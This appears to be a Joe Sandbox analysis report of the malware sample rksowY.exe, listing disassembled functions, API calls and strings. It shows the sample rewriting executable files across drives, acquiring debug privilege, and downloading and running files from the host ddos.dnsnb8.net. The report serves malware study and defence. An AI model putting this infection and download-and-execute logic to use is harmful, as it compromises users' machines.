                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 005B174C
                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 005B177C
                                • __aulldiv.LIBCMT ref: 005B1796
                                • __aulldiv.LIBCMT ref: 005B17A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: TimeValue__aulldiv$FileSystem
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe$SOFTWARE\GTplus$Time
                                • API String ID: 541852442-3888251811
                                • Opcode ID: efbb01cdf50dc7397cee4d8b721827f1d163ffe0ec487a89e89330eaca3aaac6
                                • Instruction ID: c44c4e5c54c2a3d14e6e505b069889b19e2300092eabf3ea6b57315a80385069
                                • Opcode Fuzzy Hash: efbb01cdf50dc7397cee4d8b721827f1d163ffe0ec487a89e89330eaca3aaac6
                                • Instruction Fuzzy Hash: DB115E76A00609BBDB50DA94CC9AFEFBFBCFB44B14F508115F901B6181DA71AA48CB64
                                Function 005B6076 Relevance: 11.1, APIs: 7, Instructions: 617memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 229 5b6076-5b6079 230 5b607b-5b6080 229->230 231 5b60e0-5b60eb 229->231 233 5b6082-5b6085 230->233 234 5b60f7-5b60f8 230->234 232 5b60ee-5b60f4 231->232 235 5b60f6 232->235 233->235 238 5b6087 233->238 236 5b60fa-5b60fc call 5b66c8 234->236 237 5b60fe-5b6106 234->237 235->234 236->237 241 5b6108-5b611d 237->241 242 5b6155-5b6189 VirtualFree 237->242 238->232 239 5b6089-5b6095 238->239 243 5b60a1-5b60aa 239->243 244 5b6097-5b609f 239->244 246 5b611f-5b6121 241->246 249 5b618c-5b6192 242->249 247 5b61ba-5b61c8 243->247 248 5b60b0-5b60c1 VirtualAlloc 243->248 244->243 250 5b6123 246->250 251 5b6151-5b6154 246->251 255 5b61ca-5b61d7 247->255 256 5b6243-5b6251 247->256 253 5b60c7-5b60cf 248->253 249->253 254 5b6198-5b61b0 VirtualFree 249->254 250->251 252 5b6125-5b6128 250->252 251->242 257 5b612a-5b612e 252->257 258 5b6134-5b613b 252->258 253->249 259 5b60d5-5b60df VirtualAlloc 253->259 254->247 262 5b61b2-5b61b4 254->262 263 5b61dd-5b61e0 255->263 260 5b6253 256->260 261 5b6264-5b626f 256->261 257->258 272 5b6130-5b6132 257->272 258->272 273 5b613d-5b614f 258->273 259->231 267 5b6255-5b6258 260->267 268 5b6271-5b6276 261->268 262->247 263->256 264 5b61e2-5b61f2 263->264 271 5b61f5-5b61fe 264->271 267->261 274 5b625a-5b6262 267->274 269 5b6389-5b63b1 VirtualProtect 268->269 270 5b627c-5b6289 268->270 277 5b63b7-5b63ba 269->277 285 5b628b 270->285 286 5b6292-5b6298 270->286 275 5b620c-5b6219 271->275 276 5b6200-5b6203 271->276 272->246 273->246 274->267 281 5b6238-5b623f 275->281 279 5b621b-5b6228 276->279 280 5b6205-5b6208 276->280 282 5b63fc-5b63ff VirtualProtect 277->282 283 5b63bc-5b63c2 277->283 279->281 287 5b622a-5b6236 280->287 288 5b620a 280->288 281->271 290 5b6241 281->290 284 5b6400-5b6416 282->284 283->283 289 5b63c4 283->289 291 5b6418-5b641d 284->291 292 5b6420-5b6425 284->292 285->286 293 5b62a2-5b62ac 286->293 287->281 288->281 289->282 294 5b63c6-5b63cf 289->294 290->263 295 5b62ae 293->295 296 5b62b1-5b62c8 293->296 297 5b63d1 294->297 298 5b63d4-5b63d8 294->298 295->296 299 5b62ce-5b62d4 296->299 300 5b6373-5b6384 296->300 297->298 301 5b63da 298->301 302 5b63dd-5b63e1 298->302 303 5b62da-5b62f1 299->303 304 5b62d6-5b62d9 299->304 300->268 301->302 305 5b63e3 302->305 306 5b63e7-5b63fa VirtualProtect 302->306 308 5b62f3-5b62f9 303->308 309 5b6365-5b636e 303->309 304->303 305->306 306->277 306->282 310 5b62fb-5b630f 308->310 311 5b6314-5b6326 308->311 309->293 312 5b6426-5b64a9 310->312 313 5b6328-5b634a 311->313 314 5b634c-5b6360 311->314 323 5b64ab-5b64c0 312->323 324 5b6519-5b651c 312->324 313->309 314->312 330 5b64c2 323->330 331 5b6535-5b6537 323->331 325 5b651d-5b651e 324->325 326 5b6583-5b6587 324->326 329 5b6522-5b6533 325->329 328 5b6588-5b658b 326->328 332 5b658d-5b658f 328->332 333 5b65a1-5b65a3 328->333 329->331 336 5b64f8 330->336 337 5b64c5-5b64cd 330->337 334 5b659a 331->334 335 5b6539 331->335 338 5b6591-5b6593 332->338 341 5b659b-5b659d 334->341 339 5b653b-5b6541 335->339 340 5b65b4 335->340 344 5b64fa-5b64fe 336->344 345 5b656c-5b656f 336->345 342 5b64cf-5b64d4 337->342 343 5b6542-5b6545 337->343 338->341 346 5b6595 338->346 339->343 351 5b65be-5b65db 340->351 341->338 347 5b659f 341->347 348 5b6517-5b6518 342->348 349 5b64d6-5b64d9 342->349 350 5b654d-5b6550 343->350 352 5b6572 344->352 353 5b6500 344->353 345->352 346->334 347->328 348->324 349->350 354 5b64db-5b64f5 349->354 350->351 355 5b6552-5b6556 350->355 361 5b65dd-5b65f6 351->361 357 5b6573-5b6576 352->357 353->329 358 5b6502 353->358 354->336 359 5b6578-5b657a 355->359 360 5b6558-5b6569 355->360 357->359 358->357 362 5b6504-5b6513 358->362 359->361 364 5b657c 359->364 360->345 363 5b65f7-5b6608 361->363 362->331 365 5b6515 362->365 364->363 366 5b657e-5b657f 364->366 365->348 366->326
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 005B60BE
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 005B60DF
                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 005B6189
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005B61A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 10e621c5a4eb26b359566a0806fcc07a6bdc42547a50d2beac723a7df1477b1e
                                • Instruction ID: bab2a894623870f8045d0e54295b27b432b1fa0b8520ced3aba62395d08a9fe9
                                • Opcode Fuzzy Hash: 10e621c5a4eb26b359566a0806fcc07a6bdc42547a50d2beac723a7df1477b1e
                                • Instruction Fuzzy Hash: 9D1211B25087859FDB328F64CC55BEA7FA4FF02310F1845AED8898B292D678B911CB51
                                Function 005B2B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 367 5b2b8c-5b2bc6 memset GetLogicalDriveStringsA 368 5b2c09-5b2c28 WaitForMultipleObjects 367->368 369 5b2bc8-5b2bcc 367->369 370 5b2c2a-5b2c3a CreateThread 368->370 371 5b2c3c-5b2c45 368->371 372 5b2bfa-5b2c07 lstrlen 369->372 373 5b2bce-5b2bd0 369->373 370->371 372->368 372->369 373->372 374 5b2bd2-5b2bdc GetDriveTypeA 373->374 374->372 375 5b2bde-5b2be1 374->375 375->372 376 5b2be3-5b2bf6 CreateThread 375->376 376->372
                                APIs
                                • memset.MSVCRT ref: 005B2BA6
                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 005B2BB4
                                • GetDriveTypeA.KERNEL32(?), ref: 005B2BD3
                                • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 005B2BEE
                                • lstrlen.KERNEL32(?), ref: 005B2BFB
                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 005B2C16
                                • CreateThread.KERNEL32(00000000,00000000,005B2845,00000000,00000000,00000000), ref: 005B2C3A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                • String ID:
                                • API String ID: 1073171358-0
                                • Opcode ID: 20cbdd852a089ea09b2a7c61cbf02406933637d81e9a54f112c999b8d1f51c5d
                                • Instruction ID: 4caf6c5c4215afd00e6e48092159088c1afd5de3064aa2ba3e4948480c14fb47
                                • Opcode Fuzzy Hash: 20cbdd852a089ea09b2a7c61cbf02406933637d81e9a54f112c999b8d1f51c5d
                                • Instruction Fuzzy Hash: 1121AEB180014CAFE720AF64AC88DEE7F6DFF14344F140229F852A2161D730AE0ADB71
                                Function 005B1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 5b1e6e-5b1e95 call 5b2d60 3 5b1e9c-5b1eaa call 5b1df6 0->3 4 5b1e97 call 5b1d8a 0->4 8 5b2332 3->8 9 5b1eb0-5b1ed9 SetFileAttributesA CreateFileA 3->9 4->3 11 5b2338-5b233b 8->11 9->8 10 5b1edf-5b1f28 call 5b1915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 18 5b1f2e-5b1f39 10->18 13 5b233d-5b2340 UnmapViewOfFile 11->13 14 5b2346-5b2349 11->14 13->14 16 5b234b-5b234e FindCloseChangeNotification 14->16 17 5b2350-5b2354 14->17 16->17 19 5b2391-5b239a call 5b2d9b 17->19 20 5b2356-5b235b FindCloseChangeNotification 17->20 18->8 21 5b1f3f-5b1f56 18->21 20->19 21->8 23 5b1f5c-5b1f64 21->23 23->8 25 5b1f6a-5b1f70 23->25 25->8 26 5b1f76-5b1f87 call 5b1c81 25->26 26->8 29 5b1f8d-5b1fa7 call 5b185b call 5b1c81 26->29 29->8 34 5b1fad-5b1fb4 29->34 35 5b1fb6-5b1fc5 call 5b1af9 34->35 36 5b2024-5b2045 34->36 35->36 44 5b1fc7-5b1fd2 35->44 36->8 38 5b204b-5b204e 36->38 39 5b2070-5b20f4 call 5b1af9 * 2 call 5b1c68 * 2 memset * 2 38->39 40 5b2050-5b2053 38->40 62 5b20f5-5b20fe 39->62 42 5b2056-5b205a 40->42 42->39 45 5b205c-5b2061 42->45 44->8 47 5b1fd8-5b1fe7 44->47 45->8 48 5b2067-5b206e 45->48 50 5b1fe9-5b1fec 47->50 51 5b1fef-5b2006 call 5b1af9 47->51 48->42 50->51 57 5b2008-5b200e call 5b1c68 51->57 58 5b2013-5b201e FlushViewOfFile 51->58 57->58 58->36 63 5b2130-5b2139 62->63 64 5b2100-5b2114 62->64 65 5b213c-5b2142 63->65 66 5b212d-5b212e 64->66 67 5b2116-5b212a 64->67 68 5b215c 65->68 69 5b2144-5b2150 65->69 66->62 67->66 72 5b215f-5b2162 68->72 70 5b2152-5b2154 69->70 71 5b2157-5b215a 69->71 70->71 71->65 73 5b2181-5b2184 72->73 74 5b2164-5b2171 72->74 77 5b218d-5b21ba call 5b1c68 73->77 78 5b2186 73->78 75 5b232a-5b232d 74->75 76 5b2177-5b217e 74->76 75->72 76->73 81 5b21bc-5b21d0 call 5b1c68 77->81 82 5b21d3-5b220b call 5b1c81 call 5b1c68 77->82 78->77 81->82 89 5b221b-5b221e 82->89 90 5b220d-5b2218 call 5b1c68 82->90 92 5b2220-5b2223 89->92 93 5b2226-5b231a memcpy UnmapViewOfFile FindCloseChangeNotification call 5b1b8a call 5b185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 5b1915 89->93 90->89 92->93 100 5b231f-5b2328 CloseHandle 93->100 100->11
                                APIs
                                • SetFileAttributesA.KERNEL32(?,00000080,?,005B32B0,00000164,005B2986,?), ref: 005B1EB9
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 005B1ECD
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 005B1EF3
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 005B1F07
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 005B1F1D
                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 005B201E
                                • memset.MSVCRT ref: 005B20D8
                                • memset.MSVCRT ref: 005B20EA
                                • memcpy.MSVCRT ref: 005B222D
                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B2238
                                • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B224A
                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22C6
                                • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22CB
                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22DD
                                • WriteFile.KERNEL32(000000FF,005B4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B22F7
                                • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B230D
                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 005B2322
                                • UnmapViewOfFile.KERNEL32(?,?,005B32B0,00000164,005B2986,?), ref: 005B2340
                                • FindCloseChangeNotification.KERNEL32(?,?,005B32B0,00000164,005B2986,?), ref: 005B234E
                                • FindCloseChangeNotification.KERNEL32(000000FF,?,005B32B0,00000164,005B2986,?), ref: 005B2359
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
                                • String ID: .@[$5@[$<@[$C@[$m@[
                                • API String ID: 307705342-3256145751
                                • Opcode ID: 9b309d8bd87826a7572a8d3a23b069450301ff2840cdd101a4552114e13b5e11
                                • Instruction ID: 30f775a649c8f2bb01e571f09fba0ebc345fe07b8c83c7539228e5847c3fe0b6
                                • Opcode Fuzzy Hash: 9b309d8bd87826a7572a8d3a23b069450301ff2840cdd101a4552114e13b5e11
                                • Instruction Fuzzy Hash: 6AF14671900609EFCB60DFA8D899AEDBBB5FF18304F10452AE50AA7661D730BD81CF64
                                Function 005B1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 117 5b1973-5b199a PathFileExistsA 118 5b19a0-5b19aa 117->118 119 5b1ac7-5b1acc 117->119 122 5b19af-5b19c2 CreateFileA 118->122 120 5b1ace 119->120 121 5b1ad0-5b1ad5 119->121 120->121 125 5b1af0-5b1af6 121->125 126 5b1ad7-5b1ad9 121->126 123 5b1a28-5b1a36 GetFileSize 122->123 124 5b19c4-5b19d3 Sleep 122->124 128 5b1a38-5b1a3b 123->128 129 5b1a87-5b1a8b 123->129 124->122 127 5b19d5-5b1a0b call 5b185b wsprintfA CopyFileA 124->127 126->125 127->123 141 5b1a0d-5b1a26 CreateFileA 127->141 128->129 131 5b1a3d-5b1a51 VirtualAlloc 128->131 132 5b1a8d-5b1a90 FindCloseChangeNotification 129->132 133 5b1a96-5b1a9a 129->133 131->129 135 5b1a53-5b1a57 131->135 132->133 136 5b1aad-5b1ab1 133->136 137 5b1a9c 133->137 142 5b1a59-5b1a6d ReadFile 135->142 143 5b1a80 135->143 139 5b1adb-5b1ae0 136->139 140 5b1ab3-5b1ab6 136->140 138 5b1aa0-5b1aa7 DeleteFileA 137->138 138->136 146 5b1ae2-5b1ae5 139->146 147 5b1ae7-5b1aec 139->147 140->119 144 5b1ab8-5b1ac1 VirtualFree 140->144 141->123 145 5b1a9e 141->145 142->129 148 5b1a6f-5b1a7e 142->148 143->129 144->119 145->138 146->147 147->125 149 5b1aee 147->149 148->142 148->143 149->125
                                APIs
                                • PathFileExistsA.SHLWAPI(\N[`N[,00000000,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1992
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005B19BA
                                • Sleep.KERNEL32(00000064), ref: 005B19C6
                                • wsprintfA.USER32 ref: 005B19EC
                                • CopyFileA.KERNEL32(?,?,00000000), ref: 005B1A00
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005B1A1E
                                • GetFileSize.KERNEL32(?,00000000), ref: 005B1A2C
                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005B1A46
                                • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 005B1A65
                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 005B1A90
                                • DeleteFileA.KERNEL32(?), ref: 005B1AA7
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005B1AC1
                                Strings
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B197C
                                • \N[`N[, xrefs: 005B1980
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 005B19DB
                                • %s%.8X.data, xrefs: 005B19E6
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rksowY.exe$\N[`N[
                                • API String ID: 2523042076-1262134562
                                • Opcode ID: 57a099b5db5572e2a31b125625a3939f380be56f5dd83e8e50f2190dc0bdd5bd
                                • Instruction ID: 2ccbc646f3d3f4dadc5200291ec5a03d8f1d70c4e9660845f91faba49e20ce44
                                • Opcode Fuzzy Hash: 57a099b5db5572e2a31b125625a3939f380be56f5dd83e8e50f2190dc0bdd5bd
                                • Instruction Fuzzy Hash: 42514871901619AFCB609FA8CC98AEEBFB9FB04354F504669E516F6190C330BE44DBA4
                                Function 005B28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 150 5b28b8-5b28ff memset wsprintfA 151 5b29db-5b29df 150->151 152 5b2905-5b290d 150->152 152->151 153 5b2913-5b2919 152->153 154 5b291b-5b294c memset wsprintfA call 5b29e2 153->154 155 5b2956-5b2965 strrchr 153->155 160 5b2951 154->160 155->151 156 5b2967-5b2978 lstrcmpiA 155->156 158 5b297a-5b2981 call 5b1e6e 156->158 159 5b2988-5b2992 lstrcmpiA 156->159 163 5b2986 158->163 159->151 162 5b2994-5b299b 159->162 160->151 164 5b29ad-5b29c9 strstr 162->164 165 5b299d-5b29a3 162->165 163->151 167 5b29cb-5b29d1 call 5b239d 164->167 168 5b29d3-5b29d6 call 5b2692 164->168 165->164 166 5b29a5-5b29a7 lstrcpy 165->166 166->164 167->151 168->151
                                APIs
                                • memset.MSVCRT ref: 005B28D3
                                • wsprintfA.USER32 ref: 005B28F7
                                • memset.MSVCRT ref: 005B2925
                                • wsprintfA.USER32 ref: 005B2940
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2A02
                                  • Part of subcall function 005B29E2: wsprintfA.USER32 ref: 005B2A1A
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2A44
                                  • Part of subcall function 005B29E2: lstrlen.KERNEL32(?), ref: 005B2A54
                                  • Part of subcall function 005B29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 005B2A6C
                                  • Part of subcall function 005B29E2: strrchr.MSVCRT ref: 005B2A7C
                                  • Part of subcall function 005B29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 005B2A9F
                                  • Part of subcall function 005B29E2: lstrlen.KERNEL32(Documents and Settings), ref: 005B2AAE
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2AC6
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2ADA
                                  • Part of subcall function 005B29E2: FindFirstFileA.KERNEL32(?,?), ref: 005B2AEF
                                  • Part of subcall function 005B29E2: memset.MSVCRT ref: 005B2B13
                                • strrchr.MSVCRT ref: 005B2959
                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 005B2974
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                • API String ID: 3004273771-1791786966
                                • Opcode ID: 2cb351863bd37fd0aced7d5cc4e7d56ea6a66d313c8ae6a72f1200b45b7bccc1
                                • Instruction ID: 6c5ea67281372e2cdd9318aa83eb9023b1ff9c6df10b9f98efe5570bcb8d9420
                                • Opcode Fuzzy Hash: 2cb351863bd37fd0aced7d5cc4e7d56ea6a66d313c8ae6a72f1200b45b7bccc1
                                • Instruction Fuzzy Hash: 5131B87594431DBBDB20A764DC8AFDA7F6CBF25750F040852F549A2081E6B4FAC49B70
                                Function 005B1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74stringsleepprocessCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 172 5b1099-5b10b4 173 5b10ba-5b10c7 172->173 174 5b1199-5b119c 172->174 175 5b10c8-5b10d4 173->175 176 5b10da 175->176 177 5b1184-5b1190 175->177 178 5b1113-5b1162 call 5b185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 5b1196-5b1198 177->179 182 5b1168-5b1182 lstrlen Sleep 178->182 183 5b10dc-5b110d call 5b1000 WinExec lstrlen 178->183 179->174 182->177 182->178 183->178 183->179
                                APIs
                                  • Part of subcall function 005B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1878
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1880
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1890
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1894
                                • WinExec.KERNEL32(?,00000005), ref: 005B10F1
                                • lstrlen.KERNEL32(005B4748), ref: 005B10FA
                                • wsprintfA.USER32 ref: 005B112A
                                • wsprintfA.USER32 ref: 005B1143
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 005B115B
                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 005B1169
                                • Sleep.KERNEL32 ref: 005B1179
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG[$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 1280626985-4116158746
                                • Opcode ID: 5530c939d3edd4909db0a0cabc84878a9f727b08562a6620cf90db5d0aa47e4c
                                • Instruction ID: 76555cd73d182586dc39df8659c3f7a41a1fc76e58b84a70b39c18c95c5551d6
                                • Opcode Fuzzy Hash: 5530c939d3edd4909db0a0cabc84878a9f727b08562a6620cf90db5d0aa47e4c
                                • Instruction Fuzzy Hash: 98219A75800208BBDB60ABA0DC59AEEBFBCBB11305F510195E500A2051D774BB89DF60
                                Function 005B1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 005B164F
                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 005B165B
                                • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\rksowY.exe,00000104), ref: 005B166E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 005B16AC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 005B16BD
                                  • Part of subcall function 005B139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B13BC
                                  • Part of subcall function 005B139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 005B13DA
                                  • Part of subcall function 005B139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 005B1448
                                • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B16E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
